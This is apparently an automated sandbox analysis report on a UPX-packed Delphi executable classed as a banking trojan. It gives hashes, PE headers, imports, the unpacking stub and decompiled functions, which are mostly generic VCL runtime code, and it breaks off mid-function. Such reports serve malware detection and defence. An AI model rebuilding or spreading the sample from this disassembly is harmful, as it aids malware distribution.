Hypervisor based Inspection enabled:false
Report type:full
Sample file name:E7CThb0bFa (renamed file extension from none to exe)
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:6
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal80.bank.troj.evad.winEXE@3/0@0/0
EGA Information:Failed
HDC Information:
  • Successful, ratio: 83.4% (good quality ratio 78.9%)
  • Quality average: 82.1%
  • Quality standard deviation: 27.6%
HCA Information:
  • Successful, ratio: 52%
  • Number of executed functions: 25
  • Number of non-executed functions: 230
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Stop behavior analysis, all processes terminated
Warnings:
  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General

File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Entropy (8bit):7.927240072544305
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.37%
  • UPX compressed Win32 Executable (30571/9) 0.30%
  • Win32 EXE Yoda's Crypter (26571/9) 0.26%
  • Win16/32 Executable Delphi generic (2074/23) 0.02%
  • Generic Win/DOS Executable (2004/3) 0.02%
File name:E7CThb0bFa.exe
File size:275968
MD5:ba28a06e2aae1052319541d4124122c5
SHA1:20613e49ee5b14dc04c7b045900f1d0e1b4173be
SHA256:9738c7021fdded8bb03e1588d17386dc175328630ecb0f1a3d671dfc4fb18d46
SHA512:9aaaa26c106043d56c48f89b3dd7b84ba9bbf7951c5e82a622d0eb93169e9520643bd5cb6b49dbd1cce7f5cd776e6b62b855266c099304acd3b9faa703187f25
SSDEEP:3072:q4ep6/R4I4NdnFubGtt89Z0pVaCv86giQvBjR4DtHuLUGbcQTaQQ0tQPUy8xVFQR:qmGfubsi0pVaDL4B0bcQTXJxVsGhxMI0
File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon

Icon Hash:00828e8e8686b000

Static PE Info

General

Entrypoint:0x48d160
Entrypoint Section:UPX1
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:92644df84cdbba7637462c128671f148

Entrypoint Preview

Instruction
pushad
mov esi, 0044B000h
lea edi, dword ptr [esi-0004A000h]
mov dword ptr [edi+0007809Ch], 9DB73737h
push edi
or ebp, FFFFFFFFh
jmp 00007F094CCB2920h
nop
nop
nop
nop
mov al, byte ptr [esi]
inc esi
mov byte ptr [edi], al
inc edi
add ebx, ebx
jne 00007F094CCB2919h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F094CCB28FFh
mov eax, 00000001h
add ebx, ebx
jne 00007F094CCB2919h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
add ebx, ebx
jnc 00007F094CCB291Dh
jne 00007F094CCB293Ah
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F094CCB2931h
dec eax
add ebx, ebx
jne 00007F094CCB2919h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
jmp 00007F094CCB28E6h
add ebx, ebx
jne 00007F094CCB2919h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
jmp 00007F094CCB2964h
xor ecx, ecx
sub eax, 03h
jc 00007F094CCB2923h
shl eax, 08h
mov al, byte ptr [esi]
inc esi
xor eax, FFFFFFFFh
je 00007F094CCB2987h
sar eax, 1
mov ebp, eax
jmp 00007F094CCB291Dh
add ebx, ebx
jne 00007F094CCB2919h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F094CCB28DEh
inc ecx
add ebx, ebx
jne 00007F094CCB2919h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F094CCB28D0h
add ebx, ebx
jne 00007F094CCB2919h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
add ebx, ebx
jnc 00007F094CCB2901h
jne 00007F094CCB291Bh
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jnc 00007F094CCB28F6h
add ecx, 02h
cmp ebp, 00000000h

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8e9c8 | 0x1e8 | .rsrc
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x8e000 | 0x9c8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x8d318 | 0x18 | UPX1
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
UPX0 | 0x1000 | 0x4a000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
UPX1 | 0x4b000 | 0x43000 | 0x42400 | False | 0.982060731132 | data | 7.9419130638 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x8e000 | 0x1000 | 0xc00 | False | 0.3330078125 | data | 3.33000850621 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_CURSOR | 0x869c8 | 0x134 | data | |
RT_CURSOR | 0x86afc | 0x134 | data | |
RT_CURSOR | 0x86c30 | 0x134 | data | |
RT_CURSOR | 0x86d64 | 0x134 | data | |
RT_CURSOR | 0x86e98 | 0x134 | data | |
RT_CURSOR | 0x86fcc | 0x134 | data | |
RT_CURSOR | 0x87100 | 0x134 | data | |
RT_BITMAP | 0x87234 | 0x1d0 | data | |
RT_BITMAP | 0x87404 | 0x1e4 | data | |
RT_BITMAP | 0x875e8 | 0x1d0 | data | |
RT_BITMAP | 0x877b8 | 0x1d0 | data | |
RT_BITMAP | 0x87988 | 0x1d0 | data | |
RT_BITMAP | 0x87b58 | 0x1d0 | data | |
RT_BITMAP | 0x87d28 | 0x1d0 | data | |
RT_BITMAP | 0x87ef8 | 0x1d0 | data | |
RT_BITMAP | 0x880c8 | 0x1d0 | data | |
RT_BITMAP | 0x88298 | 0x1d0 | data | |
RT_BITMAP | 0x88468 | 0xe8 | data | |
RT_DIALOG | 0x88550 | 0x52 | data | |
RT_STRING | 0x885a4 | 0xfc | data | |
RT_STRING | 0x886a0 | 0x1ec | data | |
RT_STRING | 0x8888c | 0x148 | data | |
RT_STRING | 0x889d4 | 0x274 | data | |
RT_STRING | 0x88c48 | 0x150 | data | |
RT_STRING | 0x88d98 | 0xec | data | |
RT_STRING | 0x88e84 | 0x1b0 | data | |
RT_STRING | 0x89034 | 0x450 | data | |
RT_STRING | 0x89484 | 0x364 | data | |
RT_STRING | 0x897e8 | 0x440 | data | |
RT_STRING | 0x89c28 | 0x1b0 | data | |
RT_STRING | 0x89dd8 | 0xec | data | |
RT_STRING | 0x89ec4 | 0x1e4 | data | |
RT_STRING | 0x8a0a8 | 0x3f4 | data | |
RT_STRING | 0x8a49c | 0x340 | data | |
RT_STRING | 0x8a7dc | 0x2c8 | data | |
RT_RCDATA | 0x8aaa4 | 0x10 | Non-ISO extended-ASCII text, with no line terminators | |
RT_RCDATA | 0x8aab4 | 0x25c | data | |
RT_GROUP_CURSOR | 0x8ad10 | 0x14 | data | |
RT_GROUP_CURSOR | 0x8ad24 | 0x14 | Non-ISO extended-ASCII text, with no line terminators | |
RT_GROUP_CURSOR | 0x8ad38 | 0x14 | data | |
RT_GROUP_CURSOR | 0x8ad4c | 0x14 | data | |
RT_GROUP_CURSOR | 0x8ad60 | 0x14 | data | |
RT_GROUP_CURSOR | 0x8ad74 | 0x14 | data | |
RT_GROUP_CURSOR | 0x8ad88 | 0x14 | data | |

Imports

DLL | Import
KERNEL32.DLL | LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
advapi32.dll | RegCloseKey
comctl32.dll | ImageList_Add
gdi32.dll | SaveDC
oleaut32.dll | VariantCopy
user32.dll | GetDC
version.dll | VerQueryValueA

Network Behavior

No network behavior found

Code Manipulations

System Behavior

General

Start time:02:54:36
Start date:05/04/2021
Path:C:\Users\user\Desktop\E7CThb0bFa.exe
Wow64 process (32bit):true
Commandline:'C:\Users\user\Desktop\E7CThb0bFa.exe'
Imagebase:0x400000
File size:275968 bytes
MD5 hash:BA28A06E2AAE1052319541D4124122C5
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Reputation:low

General

Start time:02:54:38
Start date:05/04/2021
Path:C:\Users\user\Desktop\E7CThb0bFa.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\Desktop\E7CThb0bFa.exe
Imagebase:0x400000
File size:275968 bytes
MD5 hash:BA28A06E2AAE1052319541D4124122C5
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

Disassembly

Code Analysis

    Executed Functions

    C-Code - Quality: 65%
    			E004054DC(intOrPtr __eax) {
    				intOrPtr _v8;
    				void* _v12;
    				char _v15;
    				char _v17;
    				char _v18;
    				char _v22;
    				int _v28;
    				char* _v32;
    				char _v293;
    				long _t58;
    				long _t75;
    				long _t77;
    				CHAR* _t84;
    				CHAR* _t87;
    				struct HINSTANCE__* _t94;
    				struct HINSTANCE__* _t101;
    				struct HINSTANCE__* _t110;
    				intOrPtr _t115;
    				void* _t124;
    				void* _t126;
    				intOrPtr _t127;
    
    				_t124 = _t126;
    				_t127 = _t126 + 0xfffffedc;
    				_v8 = __eax;
    				GetModuleFileNameA(0,  &_v293, 0x105);
    				_v22 = 0;
    				_t58 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
    				if(_t58 == 0) {
    					L3:
    					_push(_t124);
    					_push(0x4055e0);
    					_push( *[fs:eax]);
    					 *[fs:eax] = _t127;
    					_v28 = 5;
    					E00405304( &_v293, 0x105);
    					if(RegQueryValueExA(_v12,  &_v293, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, 0x40575c, 0, 0,  &_v22,  &_v28) != 0) {
    						_v22 = 0;
    					}
    					_v18 = 0;
    					_pop(_t115);
    					 *[fs:eax] = _t115;
    					_push(0x4055e7);
    					return RegCloseKey(_v12);
    				} else {
    					_t75 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
    					if(_t75 == 0) {
    						goto L3;
    					} else {
    						_t77 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
    						if(_t77 != 0) {
    							_push(0x105);
    							_push(_v8);
    							_push( &_v293);
    							L00401294();
    							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
    							_t110 = 0;
    							if(_v293 != 0 && (_v17 != 0 || _v22 != 0)) {
    								_t84 =  &_v293;
    								_push(_t84);
    								L0040129C();
    								_v32 = _t84 +  &_v293;
    								while( *_v32 != 0x2e &&  &_v293 != _v32) {
    									_v32 = _v32 - 1;
    								}
    								_t87 =  &_v293;
    								if(_t87 != _v32) {
    									_v32 = _v32 + 1;
    									if(_v22 != 0) {
    										_push(0x105 - _v32 - _t87);
    										_push( &_v22);
    										_push(_v32);
    										L00401294();
    										_t110 = LoadLibraryExA( &_v293, 0, 2);
    									}
    									if(_t110 == 0 && _v17 != 0) {
    										_push(0x105 - _v32 -  &_v293);
    										_push( &_v17);
    										_push(_v32);
    										L00401294();
    										_t94 = LoadLibraryExA( &_v293, 0, 2); // executed
    										_t110 = _t94;
    										if(_t110 == 0) {
    											_v15 = 0;
    											_push(0x105 - _v32 -  &_v293);
    											_push( &_v17);
    											_push(_v32);
    											L00401294();
    											_t101 = LoadLibraryExA( &_v293, 0, 2); // executed
    											_t110 = _t101;
    										}
    									}
    								}
    							}
    							return _t110;
    						} else {
    							goto L3;
    						}
    					}
    				}
    			}

    APIs
    • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 004054F7
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405515
    • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405533
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405551
    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,004055E0,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040559A
    • RegQueryValueExA.ADVAPI32(?,0040575C,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,004055E0,?,80000001), ref: 004055B8
    • RegCloseKey.ADVAPI32(?,004055E7,00000000,00000000,00000005,00000000,004055E0,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004055DA
    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004055F7
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405604
    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 0040560A
    • lstrlen.KERNEL32(00000000), ref: 00405635
    • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 0040568A
    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 0040569A
    • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 004056C6
    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 004056D6
    • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 00405700
    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 00405710
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
    • API String ID: 1759228003-2375825460
    • Opcode ID: 58af89e23c09c199b9831143532fdfcc0d720da703cbc6bdc81dc4164112f48a
    • Instruction ID: 78d56fb10151a52d9f41951c3ae2861171ac22a5739348b763bff528435d593e
    • Opcode Fuzzy Hash: 58af89e23c09c199b9831143532fdfcc0d720da703cbc6bdc81dc4164112f48a
    • Instruction Fuzzy Hash: 83614371A006497EEB15EAE8CC86FEF77BCDB48304F4040B6A604F61C1D6BC9A448F58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 93%
    			E0044A5F4(struct HWND__* __eax, void* __ecx, struct HWND__* __edx) {
    				struct HWND__* _v8;
    				struct HWND__* _v12;
    				struct HWND__* _v16;
    				void* __ebx;
    				void* __esi;
    				void* __ebp;
    				signed int _t161;
    				struct HWND__* _t162;
    				struct HWND__* _t163;
    				struct HWND__* _t176;
    				struct HWND__* _t185;
    				struct HWND__* _t188;
    				struct HWND__* _t189;
    				struct HWND__* _t191;
    				struct HWND__* _t197;
    				struct HWND__* _t199;
    				struct HWND__* _t202;
    				struct HWND__* _t205;
    				struct HWND__* _t206;
    				struct HWND__* _t216;
    				struct HWND__* _t217;
    				struct HWND__* _t222;
    				struct HWND__* _t224;
    				struct HWND__* _t227;
    				struct HWND__* _t231;
    				struct HWND__* _t239;
    				struct HWND__* _t247;
    				struct HWND__* _t250;
    				struct HWND__* _t254;
    				struct HWND__* _t256;
    				struct HWND__* _t257;
    				struct HWND__* _t269;
    				intOrPtr _t272;
    				struct HWND__* _t275;
    				intOrPtr* _t276;
    				struct HWND__* _t284;
    				struct HWND__* _t286;
    				struct HWND__* _t297;
    				void* _t305;
    				signed int _t307;
    				struct HWND__* _t312;
    				struct HWND__* _t313;
    				struct HWND__* _t314;
    				void* _t315;
    				intOrPtr _t336;
    				struct HWND__* _t340;
    				intOrPtr _t362;
    				void* _t364;
    				void* _t368;
    				void* _t369;
    				intOrPtr _t370;
    
    				_t315 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				_push(_t369);
    				_push(0x44acab);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t370;
    				 *(_v12 + 0xc) = 0;
    				_t305 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xa8)) + 8)) - 1;
    				if(_t305 < 0) {
    					L5:
    					E0044A4A8(_v8, _t315, _v12);
    					_t307 =  *_v12;
    					_t161 = _t307;
    					__eflags = _t161 - 0x53;
    					if(__eflags > 0) {
    						__eflags = _t161 - 0xb017;
    						if(__eflags > 0) {
    							__eflags = _t161 - 0xb020;
    							if(__eflags > 0) {
    								_t162 = _t161 - 0xb031;
    								__eflags = _t162;
    								if(_t162 == 0) {
    									_t163 = _v12;
    									__eflags =  *((intOrPtr*)(_t163 + 4)) - 1;
    									if( *((intOrPtr*)(_t163 + 4)) != 1) {
    										 *(_v8 + 0xb0) =  *(_v12 + 8);
    									} else {
    										 *(_v12 + 0xc) =  *(_v8 + 0xb0);
    									}
    									L102:
    									_pop(_t336);
    									 *[fs:eax] = _t336;
    									return 0;
    								}
    								__eflags = _t162 + 0xfffffff2 - 2;
    								if(_t162 + 0xfffffff2 - 2 < 0) {
    									 *(_v12 + 0xc) = E0044C59C(_v8,  *(_v12 + 8), _t307) & 0x0000007f;
    								} else {
    									L101:
    									E0044A56C(_t369); // executed
    								}
    								goto L102;
    							}
    							if(__eflags == 0) {
    								_t176 = _v12;
    								__eflags =  *(_t176 + 4);
    								if( *(_t176 + 4) != 0) {
    									E0044B22C(_v8,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
    								} else {
    									E0044B1D0(_v8, _t315,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
    								}
    								goto L102;
    							}
    							_t185 = _t161 - 0xb01a;
    							__eflags = _t185;
    							if(_t185 == 0) {
    								_t188 = IsIconic( *(_v8 + 0x30));
    								__eflags = _t188;
    								if(_t188 == 0) {
    									_t189 = GetFocus();
    									_t340 = _v8;
    									__eflags = _t189 -  *((intOrPtr*)(_t340 + 0x30));
    									if(_t189 ==  *((intOrPtr*)(_t340 + 0x30))) {
    										_t191 = E004423CC(0);
    										__eflags = _t191;
    										if(_t191 != 0) {
    											SetFocus(_t191);
    										}
    									}
    								}
    								goto L102;
    							}
    							__eflags = _t185 == 5;
    							if(_t185 == 5) {
    								L89:
    								E0044B59C(_v8,  *(_v12 + 8),  *(_v12 + 4));
    								goto L102;
    							} else {
    								goto L101;
    							}
    						}
    						if(__eflags == 0) {
    							_t197 =  *(_v8 + 0x44);
    							__eflags = _t197;
    							if(_t197 != 0) {
    								_t365 = _t197;
    								_t199 = E0043260C(_t197);
    								__eflags = _t199;
    								if(_t199 != 0) {
    									_t202 = IsWindowEnabled(E0043260C(_t365));
    									__eflags = _t202;
    									if(_t202 != 0) {
    										_t205 = IsWindowVisible(E0043260C(_t365));
    										__eflags = _t205;
    										if(_t205 != 0) {
    											 *0x479ba8 = 0;
    											_t206 = GetFocus();
    											SetFocus(E0043260C(_t365));
    											E0042D0C4(_t365,  *(_v12 + 4), 0x112,  *(_v12 + 8));
    											SetFocus(_t206);
    											 *0x479ba8 = 1;
    											 *(_v12 + 0xc) = 1;
    										}
    									}
    								}
    							}
    							goto L102;
    						}
    						__eflags = _t161 - 0xb000;
    						if(__eflags > 0) {
    							_t216 = _t161 - 0xb001;
    							__eflags = _t216;
    							if(_t216 == 0) {
    								_t217 = _v8;
    								__eflags =  *((short*)(_t217 + 0x10a));
    								if( *((short*)(_t217 + 0x10a)) != 0) {
    									 *((intOrPtr*)(_v8 + 0x108))();
    								}
    								goto L102;
    							}
    							__eflags = _t216 == 0x15;
    							if(_t216 == 0x15) {
    								_t222 = E0044B0A8(_v8, _t315, _v12);
    								__eflags = _t222;
    								if(_t222 != 0) {
    									 *(_v12 + 0xc) = 1;
    								}
    								goto L102;
    							} else {
    								goto L101;
    							}
    						}
    						if(__eflags == 0) {
    							_t224 = _v8;
    							__eflags =  *((short*)(_t224 + 0x112));
    							if( *((short*)(_t224 + 0x112)) != 0) {
    								 *((intOrPtr*)(_v8 + 0x110))();
    							}
    							goto L102;
    						}
    						_t227 = _t161 - 0x112;
    						__eflags = _t227;
    						if(_t227 == 0) {
    							_t231 = ( *(_v12 + 4) & 0x0000fff0) - 0xf020;
    							__eflags = _t231;
    							if(_t231 == 0) {
    								E0044AD10(_v8);
    							} else {
    								__eflags = _t231 == 0x100;
    								if(_t231 == 0x100) {
    									E0044ADC0(_v8);
    								} else {
    									E0044A56C(_t369);
    								}
    							}
    							goto L102;
    						}
    						_t239 = _t227 + 0xffffffe0 - 7;
    						__eflags = _t239;
    						if(_t239 < 0) {
    							 *(_v12 + 0xc) = SendMessageA( *(_v12 + 8), _t307 + 0xbc00,  *(_v12 + 4),  *(_v12 + 8));
    							goto L102;
    						}
    						__eflags = _t239 == 0x1e1;
    						if(_t239 == 0x1e1) {
    							_t247 = E00425998(E004258B8());
    							__eflags = _t247;
    							if(_t247 != 0) {
    								E004259F4(E004258B8());
    							}
    							goto L102;
    						} else {
    							goto L101;
    						}
    					}
    					if(__eflags == 0) {
    						goto L89;
    					}
    					__eflags = _t161 - 0x16;
    					if(__eflags > 0) {
    						__eflags = _t161 - 0x1d;
    						if(__eflags > 0) {
    							_t250 = _t161 - 0x37;
    							__eflags = _t250;
    							if(_t250 == 0) {
    								 *(_v12 + 0xc) = E0044ACF4(_v8);
    								goto L102;
    							}
    							__eflags = _t250 == 0x13;
    							if(_t250 == 0x13) {
    								_t254 = _v12;
    								__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t254 + 8)))) - 0xde534454;
    								if( *((intOrPtr*)( *((intOrPtr*)(_t254 + 8)))) == 0xde534454) {
    									_t256 = _v8;
    									__eflags =  *((char*)(_t256 + 0x9e));
    									if( *((char*)(_t256 + 0x9e)) != 0) {
    										_t257 = _v8;
    										__eflags =  *(_t257 + 0xa0);
    										if( *(_t257 + 0xa0) != 0) {
    											 *(_v12 + 0xc) = 0;
    										} else {
    											_t312 = E0040D0AC("vcltest3.dll", _t307, 0x8000);
    											 *(_v8 + 0xa0) = _t312;
    											__eflags = _t312;
    											if(_t312 == 0) {
    												 *(_v12 + 0xc) = GetLastError();
    												 *(_v8 + 0xa0) = 0;
    											} else {
    												 *(_v12 + 0xc) = 0;
    												_t313 = GetProcAddress( *(_v8 + 0xa0), "RegisterAutomation");
    												_v16 = _t313;
    												__eflags = _t313;
    												if(_t313 != 0) {
    													_t269 =  *(_v12 + 8);
    													_v16( *((intOrPtr*)(_t269 + 4)),  *((intOrPtr*)(_t269 + 8)));
    												}
    											}
    										}
    									}
    								}
    								goto L102;
    							} else {
    								goto L101;
    							}
    						}
    						if(__eflags == 0) {
    							_t272 =  *0x47bba0; // 0x2321310
    							E00449A98(_t272);
    							E0044A56C(_t369);
    							goto L102;
    						}
    						_t275 = _t161 - 0x1a;
    						__eflags = _t275;
    						if(_t275 == 0) {
    							_t276 =  *0x47a0c8; // 0x47bafc
    							E00436CA0( *_t276, _t315,  *(_v12 + 4));
    							E0044A500(_v8, _t307, _t315, _v12, _t364);
    							E0044A56C(_t369);
    							goto L102;
    						}
    						__eflags = _t275 == 2;
    						if(_t275 == 2) {
    							E0044A56C(_t369);
    							_t284 = _v12;
    							__eflags =  *((intOrPtr*)(_t284 + 4)) - 1;
    							asm("sbb eax, eax");
    							 *((char*)(_v8 + 0x9d)) = _t284 + 1;
    							_t286 = _v12;
    							__eflags =  *(_t286 + 4);
    							if( *(_t286 + 4) == 0) {
    								E0044A3FC();
    								PostMessageA( *(_v8 + 0x30), 0xb001, 0, 0);
    							} else {
    								E0044A40C(_v8);
    								PostMessageA( *(_v8 + 0x30), 0xb000, 0, 0);
    							}
    							goto L102;
    						} else {
    							goto L101;
    						}
    					}
    					if(__eflags == 0) {
    						_t297 = _v12;
    						__eflags =  *(_t297 + 4);
    						if( *(_t297 + 4) != 0) {
    							E004040E8();
    						}
    						goto L102;
    					}
    					__eflags = _t161 - 0x14;
    					if(_t161 > 0x14) {
    						goto L101;
    					}
    					switch( *((intOrPtr*)(_t161 * 4 +  &M0044A698))) {
    						case 0:
    							0 = E00419668(0, __ebx, __edi, __esi);
    							goto L102;
    						case 1:
    							goto L101;
    						case 2:
    							_push(0);
    							_push(0);
    							_push(0xb01a);
    							_v8 =  *(_v8 + 0x30);
    							_push( *(_v8 + 0x30));
    							L00406974();
    							__eax = E0044A56C(__ebp);
    							goto L102;
    						case 3:
    							__eax = _v12;
    							__eflags =  *(__eax + 4);
    							if( *(__eax + 4) == 0) {
    								__eax = E0044A56C(__ebp);
    								__eax = _v8;
    								__eflags =  *(__eax + 0xac);
    								if( *(__eax + 0xac) == 0) {
    									__eax = _v8;
    									__eax =  *(_v8 + 0x30);
    									__eax = E00442264( *(_v8 + 0x30), __ebx, __edi, __esi);
    									__edx = _v8;
    									 *(_v8 + 0xac) = __eax;
    								}
    								_v8 = L0044A404();
    							} else {
    								_v8 = E0044A40C(_v8);
    								__eax = _v8;
    								__eax =  *(_v8 + 0xac);
    								__eflags = __eax;
    								if(__eax != 0) {
    									__eax = _v8;
    									__edx = 0;
    									__eflags = 0;
    									 *(_v8 + 0xac) = 0;
    								}
    								__eax = E0044A56C(__ebp);
    							}
    							goto L102;
    						case 4:
    							__eax = _v8;
    							__eax =  *(_v8 + 0x30);
    							_push(__eax);
    							L004068E4();
    							__eflags = __eax;
    							if(__eax == 0) {
    								__eax = E0044A56C(__ebp);
    							} else {
    								__eax = E0044A5A8(__ebp);
    							}
    							goto L102;
    						case 5:
    							__eax = _v8;
    							__eax =  *(_v8 + 0x44);
    							__eflags = __eax;
    							if(__eax != 0) {
    								__eax = E00447C6C(__eax, __ecx);
    							}
    							goto L102;
    						case 6:
    							__eax = _v12;
    							 *_v12 = 0x27;
    							__eax = E0044A56C(__ebp);
    							goto L102;
    					}
    				} else {
    					_t314 = _t305 + 1;
    					_t368 = 0;
    					do {
    						if( *((intOrPtr*)(E00413E68( *((intOrPtr*)(_v8 + 0xa8)), _t368)))() != 0) {
    							_pop(_t362);
    							 *[fs:eax] = _t362;
    							return 0;
    						}
    						_t368 = _t368 + 1;
    						_t314 = _t314 - 1;
    						__eflags = _t314;
